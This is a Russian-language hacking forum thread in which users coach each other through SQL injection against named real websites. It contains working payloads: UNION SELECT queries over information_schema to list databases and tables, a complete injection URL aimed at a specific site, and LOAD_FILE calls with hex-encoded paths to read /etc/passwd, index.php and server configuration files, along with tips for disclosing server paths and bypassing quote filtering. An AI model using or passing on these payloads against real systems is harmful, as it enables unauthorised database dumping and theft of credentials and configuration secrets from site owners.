Ваши вопросы по уязвимостям.

Code:

http://forum.hse.ru/gold/index.php?t=usrinfo&id=1

и? Еще не надоело писать то, что и без вашего участия уже с такой же ошибкой (читай - кривые руки админа)?

PS: Для начала найдите сайт, которые сразу, без вас, не вываливает мильон ошибок по какой-то ссылке

 

Konqi,Pashkela

то что и без меня есть ошибки я заметил=)
мне интересно могу ли я влиять на бд каким либо образом?

 

тебе нужно бд или инклуд?

инклуд никак не связано с базой

 

а теперь подумай

 

Как выести ВСЕ базы данных, кроме текущей?
Работаю с 5 веткой)

 

select+group_concat(table_schema)+from+information_schema.tables

 

Konqi:
или
select+group_concat(schema_name)+from+information_schema.schemata

 

спасибо

 

select+database()+limit+...

 

Хотел бы узнать любую инфу по чтению файлов через sql-inj. кто может просвятить?

 

через LOAD_FILE

 

Развернутый ответ. я знаю про эту комманду, но что то в самый ответсвенный момент она не заработала. про фаил прив я тоже знаю. интересует в каком виде казывается путь до файла - site.ru/config.php так?

 

При load_file надо указывать полный путь к файлу, нет, не с доменом, а путь на самом серваке... Т.е. тебе надо раскрыть пути, если есть вывод ошибок, то пути сами вылезут, если же нет, то можно найти в /etc/passwd (сначала попробуй его прочитать, если не знаешь, как определить есть ли file_priv). И не забывай про МК, надо пути кодировать. Еще вариант найти полный путь до сервака проиндклюдить httpd.conf

 

В этой статье есть самое необходимое:
https://forum.antichat.ru/threadnav43966-1-10.html

ну и тут немного:
https://forum.antichat.ru/thread104591.html

 

есть несколько баз. (5 ветка)
есть офигеть, сколько полей и столбцов.
выбрал одно поле и вывел оттуда все названия столбцов.
А теперь как узнать какое поле к какой БД принадлежит. ?
Возможно это без тупого перебора?))

 

jecka3000 Без лимита нереально...

тут все поля к одной и той же БД

 

Используй table_schema.

Взял для примера скуль с соседней темы и добавил туда табл схему:

http://www.ry7.ru/index.php?s=-58+union+select+group_concat(0x0b,TABLE_NAME,0x3a,table_schema)+from+information_schema.tables--

Теперь будет выводится и название БД, к которой эта таблица относится. Так же точно и с колонками.

 

не могу считывать файлы, подскажите
права вроде есть
root'@'localhost' | FILE | YES

USER() - возвращает что я под root@localhost
VERSION() - 5.0.51a-3ubuntu5.5

кавычки фильтруются по этому кодирую
к примеру
etc/passwd >>> 0x6574632f706173737764

делаю такую вот инъекцию
... where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
но в результате приходит пустая строка.
файл пытаюсь открыть по пути который мне возвращается в ошибке, типа:
/usr/local/nginx/....../index.php

что я делаю не так?

 

Вообще то не всегда на /etc/passwd есть права ога?
ВО вторых читай index.php лучше, там доберёшься до конфигов.

 

1. /etc/passwd
2.

Code:

...where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#

выглядит странновато как-то
по

Code:

...where 1=2 union select 123123123,2,3,4,5,6,7,8 limit 0,100#

выводит 123123123 ?